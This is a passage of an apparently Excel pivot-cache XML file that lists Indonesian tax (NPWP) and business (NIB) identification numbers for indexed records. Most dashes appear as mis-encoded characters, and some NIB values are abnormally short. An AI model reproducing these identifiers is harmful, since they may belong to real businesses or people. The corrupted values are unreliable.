    <x v="1440"/>
    <s v="npwp"/>
    <s v="72‚Äì662‚Äì475‚Äì2‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1440"/>
    <s v="nib"/>
    <n v="812021952179"/>
  </r>
  <r>
    <x v="1441"/>
    <s v="npwp"/>
    <s v="70‚Äì408‚Äì925‚Äì9‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="1441"/>
    <s v="nib"/>
    <n v="9120006202932"/>
  </r>
  <r>
    <x v="1442"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1442"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1443"/>
    <s v="npwp"/>
    <s v="31‚Äì804‚Äì434‚Äì4‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="1443"/>
    <s v="nib"/>
    <n v="312389"/>
  </r>
  <r>
    <x v="1444"/>
    <s v="npwp"/>
    <s v="07‚Äì226‚Äì544‚Äì0‚Äì901‚Äì000"/>
  </r>
  <r>
    <x v="1444"/>
    <s v="nib"/>
    <n v="8120005853213"/>
  </r>
  <r>
    <x v="1445"/>
    <s v="npwp"/>
    <s v="03‚Äì212‚Äì403‚Äì4‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="1445"/>
    <s v="nib"/>
    <n v="8120009870793"/>
  </r>
  <r>
    <x v="1446"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1446"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1447"/>
    <s v="npwp"/>
    <s v="73‚Äì089‚Äì076‚Äì1‚Äì325‚Äì001"/>
  </r>
  <r>
    <x v="1447"/>
    <s v="nib"/>
    <n v="9120007162582"/>
  </r>
  <r>
    <x v="1448"/>
    <s v="npwp"/>
    <s v="01‚Äì069‚Äì312‚Äì5‚Äì723‚Äì001"/>
  </r>
  <r>
    <x v="1448"/>
    <s v="nib"/>
    <n v="9120008382598"/>
  </r>
  <r>
    <x v="1449"/>
    <s v="npwp"/>
    <s v="03‚Äì011‚Äì520‚Äì8‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1449"/>
    <s v="nib"/>
    <n v="9120108823803"/>
  </r>
  <r>
    <x v="1450"/>
    <s v="npwp"/>
    <s v="90‚Äì741‚Äì323‚Äì1‚Äì912‚Äì000"/>
  </r>
  <r>
    <x v="1450"/>
    <s v="nib"/>
    <n v="9120003351438"/>
  </r>
  <r>
    <x v="1451"/>
    <s v="npwp"/>
    <s v="09‚Äì690‚Äì959‚Äì3‚Äì722‚Äì000"/>
  </r>
  <r>
    <x v="1452"/>
    <s v="npwp"/>
    <s v="03‚Äì304‚Äì727‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1452"/>
    <s v="nib"/>
    <n v="8120110062896"/>
  </r>
  <r>
    <x v="1453"/>
    <s v="npwp"/>
    <s v="90‚Äì718‚Äì012‚Äì9‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1453"/>
    <s v="nib"/>
    <n v="9120402321631"/>
  </r>
  <r>
    <x v="1454"/>
    <s v="npwp"/>
    <s v="02‚Äì000‚Äì590‚Äì6‚Äì824‚Äì001"/>
  </r>
  <r>
    <x v="1454"/>
    <s v="nib"/>
    <n v="8120006722905"/>
  </r>
  <r>
    <x v="1455"/>
    <s v="npwp"/>
    <s v="74‚Äì698‚Äì083‚Äì8‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1455"/>
    <s v="nib"/>
    <n v="8120002950735"/>
  </r>
  <r>
    <x v="1456"/>
    <s v="npwp"/>
    <s v="83‚Äì561‚Äì822‚Äì4‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="1456"/>
    <s v="nib"/>
    <n v="8120110150069"/>
  </r>
  <r>
    <x v="1457"/>
    <s v="npwp"/>
    <s v="02‚Äì910‚Äì916‚Äì2‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1457"/>
    <s v="nib"/>
    <n v="8120116133701"/>
  </r>
  <r>
    <x v="1458"/>
    <s v="npwp"/>
    <s v="01‚Äì071‚Äì316‚Äì2‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1458"/>
    <s v="nib"/>
    <n v="8120210171055"/>
  </r>
  <r>
    <x v="1459"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì065‚Äì1‚Äì822‚Äì002"/>
  </r>
  <r>
    <x v="1459"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="1460"/>
    <s v="npwp"/>
    <s v="74‚Äì571‚Äì372‚Äì7‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1460"/>
    <s v="nib"/>
    <n v="8120112270056"/>
  </r>
  <r>
    <x v="1461"/>
    <s v="npwp"/>
    <s v="03‚Äì260‚Äì781‚Äì4‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1461"/>
    <s v="nib"/>
    <n v="8120016241496"/>
  </r>
  <r>
    <x v="1462"/>
    <s v="npwp"/>
    <s v="07‚Äì327‚Äì162‚Äì9‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1462"/>
    <s v="nib"/>
    <n v="9120113151258"/>
  </r>
  <r>
    <x v="1463"/>
    <s v="npwp"/>
    <s v="49‚Äì946‚Äì953‚Äì4‚Äì502‚Äì000"/>
  </r>
  <r>
    <x v="1463"/>
    <s v="nib"/>
    <n v="9120005632479"/>
  </r>
  <r>
    <x v="1464"/>
    <s v="npwp"/>
    <s v="08‚Äì850‚Äì552‚Äì4‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1464"/>
    <s v="nib"/>
    <n v="9120106950093"/>
  </r>
  <r>
    <x v="1465"/>
    <s v="npwp"/>
    <s v="03‚Äì212‚Äì403‚Äì4‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="1465"/>
    <s v="nib"/>
    <n v="8120009870793"/>
  </r>
  <r>
    <x v="1466"/>
    <s v="npwp"/>
    <s v="03‚Äì235‚Äì795‚Äì6‚Äì012‚Äì000"/>
  </r>
  <r>
    <x v="1466"/>
    <s v="nib"/>
    <n v="9120209161144"/>
  </r>
  <r>
    <x v="1467"/>
    <s v="npwp"/>
    <s v="21‚Äì118‚Äì829‚Äì7‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1467"/>
    <s v="nib"/>
    <n v="8120314011064"/>
  </r>
  <r>
    <x v="1468"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1468"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1469"/>
    <s v="npwp"/>
    <s v="01‚Äì882‚Äì739‚Äì4‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1469"/>
    <s v="nib"/>
    <n v="9120107311428"/>
  </r>
  <r>
    <x v="1470"/>
    <s v="npwp"/>
    <s v="31‚Äì226‚Äì556‚Äì4‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1470"/>
    <s v="nib"/>
    <n v="9120005192434"/>
  </r>
  <r>
    <x v="1471"/>
    <s v="npwp"/>
    <s v="15‚Äì975‚Äì424‚Äì1‚Äì731‚Äì000"/>
  </r>
  <r>
    <x v="1472"/>
    <s v="npwp"/>
    <s v="07‚Äì356‚Äì884‚Äì2‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="1472"/>
    <s v="nib"/>
    <n v="8120100813203"/>
  </r>
  <r>
    <x v="1473"/>
    <s v="npwp"/>
    <s v="31‚Äì422‚Äì864‚Äì4‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="1473"/>
    <s v="nib"/>
    <n v="9120106231226"/>
  </r>
  <r>
    <x v="1474"/>
    <s v="npwp"/>
    <s v="80‚Äì885‚Äì237‚Äì0‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1474"/>
    <s v="nib"/>
    <n v="9120208102946"/>
  </r>
  <r>
    <x v="1475"/>
    <s v="npwp"/>
    <s v="75‚Äì755‚Äì485‚Äì2‚Äì067‚Äì000"/>
  </r>
  <r>
    <x v="1475"/>
    <s v="nib"/>
    <n v="9120006102198"/>
  </r>
  <r>
    <x v="1476"/>
    <s v="npwp"/>
    <s v="03‚Äì280‚Äì990‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1476"/>
    <s v="nib"/>
    <n v="8120109752973"/>
  </r>
  <r>
    <x v="1477"/>
    <s v="npwp"/>
    <s v="70‚Äì242‚Äì516‚Äì6‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1477"/>
    <s v="nib"/>
    <n v="9120003183408"/>
  </r>
  <r>
    <x v="1478"/>
    <s v="npwp"/>
    <s v="36.707.093.5-642.000"/>
  </r>
  <r>
    <x v="1478"/>
    <s v="nib"/>
    <n v="9120307312773"/>
  </r>
  <r>
    <x v="1479"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1479"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1480"/>
    <s v="npwp"/>
    <s v="82‚Äì726‚Äì982‚Äì0‚Äì732‚Äì000"/>
  </r>
  <r>
    <x v="1481"/>
    <s v="npwp"/>
    <s v="75.916.396.7-225.000"/>
  </r>
  <r>
    <x v="1481"/>
    <s v="nib"/>
    <n v="9120301612869"/>
  </r>
  <r>
    <x v="1482"/>
    <s v="npwp"/>
    <s v="80‚Äì457‚Äì569‚Äì4‚Äì124‚Äì000"/>
  </r>
  <r>
    <x v="1482"/>
    <s v="nib"/>
    <n v="8120416121249"/>
  </r>
  <r>
    <x v="1483"/>
    <s v="npwp"/>
    <s v="03‚Äì260‚Äì781‚Äì4‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1483"/>
    <s v="nib"/>
    <n v="8120016241496"/>
  </r>
  <r>
    <x v="1484"/>
    <s v="npwp"/>
    <s v="85‚Äì435‚Äì475‚Äì0‚Äì048‚Äì000"/>
  </r>
  <r>
    <x v="1484"/>
    <s v="nib"/>
    <n v="9120100181718"/>
  </r>
  <r>
    <x v="1485"/>
    <s v="npwp"/>
    <s v="09‚Äì976‚Äì581‚Äì0‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1485"/>
    <s v="nib"/>
    <n v="8120118261832"/>
  </r>
  <r>
    <x v="1486"/>
    <s v="npwp"/>
    <s v="81‚Äì276‚Äì479‚Äì3‚Äì414‚Äì000"/>
  </r>
  <r>
    <x v="1486"/>
    <s v="nib"/>
    <n v="8120001970694"/>
  </r>
  <r>
    <x v="1487"/>
    <s v="npwp"/>
    <s v="02‚Äì821‚Äì702‚Äì4‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1487"/>
    <s v="nib"/>
    <n v="9120107152683"/>
  </r>
  <r>
    <x v="1488"/>
    <s v="npwp"/>
    <s v="03‚Äì218‚Äì262‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1488"/>
    <s v="nib"/>
    <n v="9120007190831"/>
  </r>
  <r>
    <x v="1489"/>
    <s v="npwp"/>
    <s v="82‚Äì239‚Äì375‚Äì7‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1489"/>
    <s v="nib"/>
    <n v="8120017150913"/>
  </r>
  <r>
    <x v="1490"/>
    <s v="npwp"/>
    <s v="83‚Äì385‚Äì700‚Äì6‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1490"/>
    <s v="nib"/>
    <n v="8120115262613"/>
  </r>
  <r>
    <x v="1491"/>
    <s v="npwp"/>
    <s v="14‚Äì592‚Äì627‚Äì5‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1491"/>
    <s v="nib"/>
    <n v="9120001180943"/>
  </r>
  <r>
    <x v="1492"/>
    <s v="npwp"/>
    <s v="75‚Äì115‚Äì208‚Äì3‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1492"/>
    <s v="nib"/>
    <n v="8120109801641"/>
  </r>
  <r>
    <x v="1493"/>
    <s v="npwp"/>
    <s v="03‚Äì244‚Äì696‚Äì5‚Äì832‚Äì000"/>
  </r>
  <r>
    <x v="1493"/>
    <s v="nib"/>
    <n v="8120016200489"/>
  </r>
  <r>
    <x v="1494"/>
    <s v="npwp"/>
    <s v="31‚Äì217‚Äì527‚Äì6‚Äì436‚Äì000"/>
  </r>
  <r>
    <x v="1494"/>
    <s v="nib"/>
    <n v="8120001761861"/>
  </r>
  <r>
    <x v="1495"/>
    <s v="npwp"/>
    <s v="14‚Äì745‚Äì622‚Äì2‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1495"/>
    <s v="nib"/>
    <n v="8130016734751"/>
  </r>
  <r>
    <x v="1496"/>
    <s v="npwp"/>
    <s v="06‚Äì924‚Äì521‚Äì5‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1496"/>
    <s v="nib"/>
    <n v="8110023987435"/>
  </r>
  <r>
    <x v="1497"/>
    <s v="npwp"/>
    <s v="76‚Äì853‚Äì979‚Äì3‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1497"/>
    <s v="nib"/>
    <n v="9120301152214"/>
  </r>
  <r>
    <x v="1498"/>
    <s v="npwp"/>
    <s v="71‚Äì333‚Äì253‚Äì4‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1498"/>
    <s v="nib"/>
    <n v="8120001971344"/>
  </r>
  <r>
    <x v="1499"/>
    <s v="npwp"/>
    <s v="06‚Äì692‚Äì894‚Äì6‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1499"/>
    <s v="nib"/>
    <n v="9120300200969"/>
  </r>
  <r>
    <x v="1500"/>
    <s v="npwp"/>
    <s v="91‚Äì158‚Äì883‚Äì8‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1500"/>
    <s v="nib"/>
    <n v="9120117052942"/>
  </r>
  <r>
    <x v="1501"/>
    <s v="npwp"/>
    <s v="80.028.690.8-518.000"/>
  </r>
  <r>
    <x v="1501"/>
    <s v="nib"/>
    <n v="9120206461754"/>
  </r>
  <r>
    <x v="1502"/>
    <s v="npwp"/>
    <s v="26‚Äì525‚Äì720‚Äì4‚Äì422‚Äì000"/>
  </r>
  <r>
    <x v="1502"/>
    <s v="nib"/>
    <n v="8120003930576"/>
  </r>
  <r>
    <x v="1503"/>
    <s v="npwp"/>
    <s v="02‚Äì592‚Äì947‚Äì2‚Äì027‚Äì000"/>
  </r>
  <r>
    <x v="1503"/>
    <s v="nib"/>
    <n v="8120118281711"/>
  </r>
  <r>
    <x v="1504"/>
    <s v="npwp"/>
    <s v="82‚Äì680‚Äì123‚Äì5‚Äì647‚Äì000"/>
  </r>
  <r>
    <x v="1504"/>
    <s v="nib"/>
    <n v="9120100931925"/>
  </r>
  <r>
    <x v="1505"/>
    <s v="npwp"/>
    <s v="01‚Äì807‚Äì688‚Äì5‚Äì031‚Äì000"/>
  </r>
  <r>
    <x v="1505"/>
    <s v="nib"/>
    <n v="8120301800617"/>
  </r>
  <r>
    <x v="1506"/>
    <s v="npwp"/>
    <s v="14‚Äì639‚Äì436‚Äì6‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1506"/>
    <s v="nib"/>
    <n v="8120217272812"/>
  </r>
  <r>
    <x v="1507"/>
    <s v="npwp"/>
    <s v="70‚Äì303‚Äì838‚Äì0‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="1507"/>
    <s v="nib"/>
    <n v="9120306470182"/>
  </r>
  <r>
    <x v="1508"/>
    <s v="npwp"/>
    <s v="02‚Äì864‚Äì094‚Äì4‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="1508"/>
    <s v="nib"/>
    <n v="9120402290546"/>
  </r>
  <r>
    <x v="1509"/>
    <s v="npwp"/>
    <s v="84‚Äì743‚Äì114‚Äì5‚Äì832‚Äì000"/>
  </r>
  <r>
    <x v="1509"/>
    <s v="nib"/>
    <n v="9120108960164"/>
  </r>
  <r>
    <x v="1510"/>
    <s v="npwp"/>
    <s v="80-323-340‚Äì2‚Äì212‚Äì000"/>
  </r>
  <r>
    <x v="1510"/>
    <s v="nib"/>
    <n v="9120002401073"/>
  </r>
  <r>
    <x v="1511"/>
    <s v="npwp"/>
    <s v="24‚Äì107‚Äì612‚Äì4‚Äì624‚Äì000"/>
  </r>
  <r>
    <x v="1511"/>
    <s v="nib"/>
    <n v="8120319012252"/>
  </r>
  <r>
    <x v="1512"/>
    <s v="npwp"/>
    <s v="03‚Äì234‚Äì079‚Äì6‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1512"/>
    <s v="nib"/>
    <n v="9120205352493"/>
  </r>
  <r>
    <x v="1513"/>
    <s v="npwp"/>
    <s v="75‚Äì423‚Äì955‚Äì6‚Äì702‚Äì000"/>
  </r>
  <r>
    <x v="1513"/>
    <s v="nib"/>
    <n v="9120005510018"/>
  </r>
  <r>
    <x v="1514"/>
    <s v="npwp"/>
    <s v="02‚Äì774‚Äì921‚Äì7‚Äì511‚Äì000"/>
  </r>
  <r>
    <x v="1514"/>
    <s v="nib"/>
    <n v="8120116162975"/>
  </r>
  <r>
    <x v="1515"/>
    <s v="npwp"/>
    <s v="71‚Äì980‚Äì430‚Äì4‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="1515"/>
    <s v="nib"/>
    <n v="9120504812733"/>
  </r>
  <r>
    <x v="1516"/>
    <s v="npwp"/>
    <s v="01‚Äì832‚Äì746‚Äì0‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1516"/>
    <s v="nib"/>
    <n v="9120005123108"/>
  </r>
  <r>
    <x v="1517"/>
    <s v="npwp"/>
    <s v="03‚Äì237‚Äì678‚Äì2‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="1517"/>
    <s v="nib"/>
    <n v="9120207132759"/>
  </r>
  <r>
    <x v="1518"/>
    <s v="npwp"/>
    <s v="74‚Äì673‚Äì060‚Äì5‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1518"/>
    <s v="nib"/>
    <n v="8120104982973"/>
  </r>
  <r>
    <x v="1519"/>
    <s v="npwp"/>
    <s v="31‚Äì649‚Äì133‚Äì1‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="1519"/>
    <s v="nib"/>
    <n v="9120019130126"/>
  </r>
  <r>
    <x v="1520"/>
    <s v="npwp"/>
    <s v="12‚Äì312‚Äì421‚Äì3‚Äì545‚Äì500"/>
  </r>
  <r>
    <x v="1520"/>
    <s v="nib"/>
    <n v="12414"/>
  </r>
  <r>
    <x v="1521"/>
    <s v="npwp"/>
    <s v="73‚Äì442‚Äì498‚Äì9‚Äì656‚Äì000"/>
  </r>
  <r>
    <x v="1521"/>
    <s v="nib"/>
    <n v="9120401242902"/>
  </r>
  <r>
    <x v="1522"/>
    <s v="npwp"/>
    <s v="07‚Äì885‚Äì904‚Äì8‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="1522"/>
    <s v="nib"/>
    <n v="9120219072723"/>
  </r>
  <r>
    <x v="1523"/>
    <s v="npwp"/>
    <s v="14‚Äì613‚Äì747‚Äì6‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1523"/>
    <s v="nib"/>
    <n v="9120107340851"/>
  </r>
  <r>
    <x v="1524"/>
    <s v="npwp"/>
    <s v="91‚Äì184‚Äì909‚Äì9‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1524"/>
    <s v="nib"/>
    <n v="9120110152379"/>
  </r>
  <r>
    <x v="1525"/>
    <s v="npwp"/>
    <s v="70‚Äì851‚Äì513‚Äì5‚Äì908‚Äì000"/>
  </r>
  <r>
    <x v="1525"/>
    <s v="nib"/>
    <n v="9120005480535"/>
  </r>
  <r>
    <x v="1526"/>
    <s v="npwp"/>
    <s v="03.117.835.3-061.000"/>
  </r>
  <r>
    <x v="1526"/>
    <s v="nib"/>
    <n v="9120107200414"/>
  </r>
  <r>
    <x v="1527"/>
    <s v="npwp"/>
    <s v="14‚Äì639‚Äì368‚Äì1‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1527"/>
    <s v="nib"/>
    <n v="8120018281706"/>
  </r>
  <r>
    <x v="1528"/>
    <s v="npwp"/>
    <s v="80‚Äì864‚Äì647‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1528"/>
    <s v="nib"/>
    <n v="8120203831444"/>
  </r>
  <r>
    <x v="1529"/>
    <s v="npwp"/>
    <s v="02‚Äì094‚Äì015‚Äì1‚Äì124‚Äì000"/>
  </r>
  <r>
    <x v="1529"/>
    <s v="nib"/>
    <n v="9120106400955"/>
  </r>
  <r>
    <x v="1530"/>
    <s v="npwp"/>
    <s v="03‚Äì247‚Äì535‚Äì2‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1530"/>
    <s v="nib"/>
    <n v="8120100902448"/>
  </r>
  <r>
    <x v="1531"/>
    <s v="npwp"/>
    <s v="01‚Äì654‚Äì019‚Äì7‚Äì921‚Äì001"/>
  </r>
  <r>
    <x v="1531"/>
    <s v="nib"/>
    <n v="9120205450027"/>
  </r>
  <r>
    <x v="1532"/>
    <s v="npwp"/>
    <s v="82‚Äì191‚Äì806‚Äì7‚Äì305‚Äì000"/>
  </r>
  <r>
    <x v="1532"/>
    <s v="nib"/>
    <n v="8120013290666"/>
  </r>
  <r>
    <x v="1533"/>
    <s v="npwp"/>
    <s v="01‚Äì573‚Äì843‚Äì8‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="1533"/>
    <s v="nib"/>
    <n v="8120212083004"/>
  </r>
  <r>
    <x v="1534"/>
    <s v="npwp"/>
    <s v="01‚Äì807‚Äì688‚Äì5‚Äì031‚Äì000"/>
  </r>
  <r>
    <x v="1534"/>
    <s v="nib"/>
    <n v="8120301800617"/>
  </r>
  <r>
    <x v="1535"/>
    <s v="npwp"/>
    <s v="01‚Äì644‚Äì559‚Äì5‚Äì059‚Äì000"/>
  </r>
  <r>
    <x v="1535"/>
    <s v="nib"/>
    <n v="8120005801801"/>
  </r>
  <r>
    <x v="1536"/>
    <s v="npwp"/>
    <s v="21.821.107.6-804.000"/>
  </r>
  <r>
    <x v="1536"/>
    <s v="nib"/>
    <n v="9120108441819"/>
  </r>
  <r>
    <x v="1537"/>
    <s v="npwp"/>
    <s v="01‚Äì303‚Äì285‚Äì9‚Äì075‚Äì000"/>
  </r>
  <r>
    <x v="1537"/>
    <s v="nib"/>
    <n v="9120204560322"/>
  </r>
  <r>
    <x v="1538"/>
    <s v="npwp"/>
    <s v="02‚Äì843‚Äì943‚Äì8‚Äì624‚Äì000"/>
  </r>
  <r>
    <x v="1538"/>
    <s v="nib"/>
    <n v="8120108990436"/>
  </r>
  <r>
    <x v="1539"/>
    <s v="npwp"/>
    <s v="01‚Äì440‚Äì997‚Äì3‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="1539"/>
    <s v="nib"/>
    <n v="8120116130922"/>
  </r>
  <r>
    <x v="1540"/>
    <s v="npwp"/>
    <s v="02‚Äì370‚Äì594‚Äì0‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="1540"/>
    <s v="nib"/>
    <n v="9120211102815"/>
  </r>
  <r>
    <x v="1541"/>
    <s v="npwp"/>
    <s v="73‚Äì290‚Äì898‚Äì3‚Äì921‚Äì000"/>
  </r>
  <r>
    <x v="1541"/>
    <s v="nib"/>
    <n v="9120007360556"/>
  </r>
  <r>
    <x v="1542"/>
    <s v="npwp"/>
    <s v="82‚Äì141‚Äì233‚Äì5‚Äì905‚Äì000"/>
  </r>
  <r>
    <x v="1542"/>
    <s v="nib"/>
    <n v="8120003902608"/>
  </r>
  <r>
    <x v="1543"/>
    <s v="npwp"/>
    <s v="02‚Äì299‚Äì507‚Äì0‚Äì518‚Äì000"/>
  </r>
  <r>
    <x v="1543"/>
    <s v="nib"/>
    <n v="220006183908"/>
  </r>
  <r>
    <x v="1544"/>
    <s v="npwp"/>
    <s v="86‚Äì417‚Äì106‚Äì1‚Äì624‚Äì000"/>
  </r>
  <r>
    <x v="1544"/>
    <s v="nib"/>
    <n v="8120219191046"/>
  </r>
  <r>
    <x v="1545"/>
    <s v="npwp"/>
    <s v="01‚Äì573‚Äì843‚Äì8‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="1545"/>
    <s v="nib"/>
    <n v="8120212083004"/>
  </r>
  <r>
    <x v="1546"/>
    <s v="npwp"/>
    <s v="91‚Äì044‚Äì539‚Äì4‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="1546"/>
    <s v="nib"/>
    <n v="9120006450645"/>
  </r>
  <r>
    <x v="1547"/>
    <s v="npwp"/>
    <s v="02.667.165.1-951.000"/>
  </r>
  <r>
    <x v="1547"/>
    <s v="nib"/>
    <n v="9120001272067"/>
  </r>
  <r>
    <x v="1548"/>
    <s v="npwp"/>
    <s v="01‚Äì618‚Äì707‚Äì2‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1548"/>
    <s v="nib"/>
    <n v="8120108912351"/>
  </r>
  <r>
    <x v="1549"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1550"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1550"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1551"/>
    <s v="npwp"/>
    <s v="31‚Äì439‚Äì379‚Äì4‚Äì823‚Äì001"/>
  </r>
  <r>
    <x v="1551"/>
    <s v="nib"/>
    <n v="8120119053301"/>
  </r>
  <r>
    <x v="1552"/>
    <s v="npwp"/>
    <s v="76‚Äì464‚Äì294‚Äì8‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="1552"/>
    <s v="nib"/>
    <n v="9120106501766"/>
  </r>
  <r>
    <x v="1553"/>
    <s v="npwp"/>
    <s v="02‚Äì066‚Äì413‚Äì2‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="1553"/>
    <s v="nib"/>
    <n v="9120204252581"/>
  </r>
  <r>
    <x v="1554"/>
    <s v="npwp"/>
    <s v="07‚Äì828‚Äì823‚Äì0‚Äì532‚Äì000"/>
  </r>
  <r>
    <x v="1555"/>
    <s v="npwp"/>
    <s v="72‚Äì681‚Äì362‚Äì9‚Äì625‚Äì000"/>
  </r>
  <r>
    <x v="1555"/>
    <s v="nib"/>
    <n v="9120004463502"/>
  </r>
  <r>
    <x v="1556"/>
    <s v="npwp"/>
    <s v="91.732.421.2-922.000"/>
  </r>
  <r>
    <x v="1556"/>
    <s v="nib"/>
    <n v="9120018101595"/>
  </r>
  <r>
    <x v="1557"/>
    <s v="npwp"/>
    <s v="02‚Äì535‚Äì044‚Äì8‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="1557"/>
    <s v="nib"/>
    <n v="9120100311858"/>
  </r>
  <r>
    <x v="1558"/>
    <s v="npwp"/>
    <s v="16‚Äì279‚Äì759‚Äì1‚Äì305‚Äì000"/>
  </r>
  <r>
    <x v="1558"/>
    <s v="nib"/>
    <n v="9120005371016"/>
  </r>
  <r>
    <x v="1559"/>
    <s v="npwp"/>
    <s v="07‚Äì975‚Äì137‚Äì6‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1559"/>
    <s v="nib"/>
    <n v="8120115281649"/>
  </r>
  <r>
    <x v="1560"/>
    <s v="npwp"/>
    <s v="01‚Äì517‚Äì118‚Äì4‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="1560"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="1561"/>
    <s v="npwp"/>
    <s v="06‚Äì776‚Äì569‚Äì3‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1561"/>
    <s v="nib"/>
    <n v="9120002251717"/>
  </r>
  <r>
    <x v="1562"/>
    <s v="npwp"/>
    <s v="01‚Äì111‚Äì844‚Äì5‚Äì809‚Äì001"/>
  </r>
  <r>
    <x v="1562"/>
    <s v="nib"/>
    <n v="9120204300255"/>
  </r>
  <r>
    <x v="1563"/>
    <s v="npwp"/>
    <s v="02‚Äì560‚Äì903‚Äì3‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1563"/>
    <s v="nib"/>
    <n v="8120009951025"/>
  </r>
  <r>
    <x v="1564"/>
    <s v="npwp"/>
    <s v="85‚Äì876‚Äì102‚Äì6‚Äì455‚Äì001"/>
  </r>
  <r>
    <x v="1564"/>
    <s v="nib"/>
    <n v="9120002482481"/>
  </r>
  <r>
    <x v="1565"/>
    <s v="npwp"/>
    <s v="03‚Äì346‚Äì410‚Äì8‚Äì505‚Äì000"/>
  </r>
  <r>
    <x v="1565"/>
    <s v="nib"/>
    <n v="8120104931636"/>
  </r>
  <r>
    <x v="1566"/>
    <s v="npwp"/>
    <s v="75‚Äì618‚Äì599‚Äì7‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1566"/>
    <s v="nib"/>
    <n v="9120208461506"/>
  </r>
  <r>
    <x v="1567"/>
    <s v="npwp"/>
    <s v="01‚Äì770‚Äì587‚Äì2‚Äì452‚Äì001"/>
  </r>
  <r>
    <x v="1567"/>
    <s v="nib"/>
    <n v="8120001880571"/>
  </r>
  <r>
    <x v="1568"/>
    <s v="npwp"/>
    <s v="71‚Äì700‚Äì855‚Äì0‚Äì405‚Äì000"/>
  </r>
  <r>
    <x v="1568"/>
    <s v="nib"/>
    <n v="9120101521177"/>
  </r>
  <r>
    <x v="1569"/>
    <s v="npwp"/>
    <s v="82‚Äì648‚Äì565‚Äì8‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="1569"/>
    <s v="nib"/>
    <n v="9120208292657"/>
  </r>
  <r>
    <x v="1570"/>
    <s v="npwp"/>
    <s v="02‚Äì881‚Äì392‚Äì1‚Äì036‚Äì000"/>
  </r>
  <r>
    <x v="1570"/>
    <s v="nib"/>
    <n v="9120307232559"/>
  </r>
  <r>
    <x v="1571"/>
    <s v="npwp"/>
